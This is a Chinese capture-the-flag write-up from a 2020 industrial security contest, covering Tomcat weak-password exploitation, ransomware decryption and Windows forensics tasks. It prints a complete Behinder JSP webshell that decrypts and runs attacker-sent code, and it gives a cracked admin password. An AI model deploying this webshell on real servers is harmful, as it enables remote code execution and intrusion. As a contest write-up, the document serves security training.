2020工业安全技能大赛——应急&电力专场部分WriteUp

原文:

Pdsdt’s Blog

平台登陆

需要我们连接VPN才能进入内网,登陆用户名和密码需要在平台进行申请,用的接入设备是深信服的软件,总体连接还是比较稳定的

image.png-71.6kB

传输模式改为TCP比较稳定,主办方提供了具体的网段10.10.1.X,我们可以利用工具进行IP和服务探测,这里我使用的Advance_IP_Scanner

image.png-82.9kB

电力专场

互联网大区题目一

扫描内网发现10.10.1.55的靶机开启WEB服务

image.png-12.3kB

访问一下发现是Jsp搭建的博客,懒得手动测试了,直接上了扫描器

image.png-89.1kB

发现了存在弱口令登陆

image.png-56.2kB

在manager/html目录下,存在文件上传的点,我们可以构造我们的WEBSHELL压缩成WAR包上传,之后tomcat会服务会自动解包并将我们的WEBSHELL解析

image.png-78.7kB

访问发现有其他人上马的痕迹,省时间直接骑别人的了

image.png-30.3kB

发现在ROOT目录下存在f1ag.txt,直接下载查看即可获取flag

image.png-33.8kB

互联网大区题目二

与上一道题目是一个环境,不过提示我们在WEB环境仍然存在一个flag,为了方便期间上传我们的冰蝎马进行链接

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

后来找了WEB源码也没找到,想到了去数据库查找,先把源码都给Down了下来,找一下数据库的配置文件

image.png-40.2kB

使用冰蝎进行数据库连接,还是没有找到flag,之后找了后台登陆的用户名和密码

username= admin
md5(password)= ee955f62cb93483a635817b9f263439e # cmd5解出来的密码和数据库连接密码一样shenmiliu

登陆后台还是没有发现flag,想问问其他师傅们这个题目的flag到底是什么东西

应急专场

这个题目需要我们登陆远程桌面进行获取,远程桌面是WIN7的系统,想到了用户名应该为Administrator,利用主办方给我们提供的主机密码成功登陆

image.png-400.3kB

不过顺利都是暂时的,后面我还遇到了,密码被修改、协议不正确、服务被关闭、主机IP变化等问题,等到六点之后内网的服务才趋于稳定…

解勒索病毒

桌面给了一个flag.txt.vlojw的文件,我们需要解密一下这个文件,在主机里进行信息收集,可以在admin的桌面下找到VLOJW-DECRYPT.txt,打开后发现勒索病毒为GANDCRAB V5.1
通过查阅资料可以知道该病毒已经有了解密软件

https://www.52pojie.cn/forum.php?mod=viewthread&tid=874030&highlight=GANDCRAB

直接使用软件进行扫描修复即可

image.png-25.2kB

要注意的是,软件需要很长的时间,等着就完事了,解密成功后,就会在桌面下出现flag.txt

image.png-143kB

病毒分析3

分析从远程获取到的文件,分析17-010补丁文件

image.png-20kB

从远程dump部分文件下来。
题目寻找为MSF生成的马的ip,这里直接去运行文件,抓包分析即可。
运行17-010补丁并且抓包

image.png-65.9kB

rdp攻击日志分析

参考文章:

https://blog.csdn.net/m0_37552052/article/details/82894963

事件管理器中找到TerminalServices-RemoteConnectionManager
选择日志进程号1149找ip

image.png-127.4kB

浏览器取证

仍然是注册表里找信息

image.png-157.7kB

这几个题目主要都是考察注册表的熟悉程度

内存取证分析

全场最离谱的题目,没有之一,给了一个加密的RAR让我们破解,队友有尝试爆破的,后来七点多的时候,一个队友试了一下主办方提供的远程桌面登陆的密码,结果打开了…

image.png-3.5kB

image.png-15.2kB

赛后

希望下两场的环境能够稳定一些,能够多一点赛事体验感


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值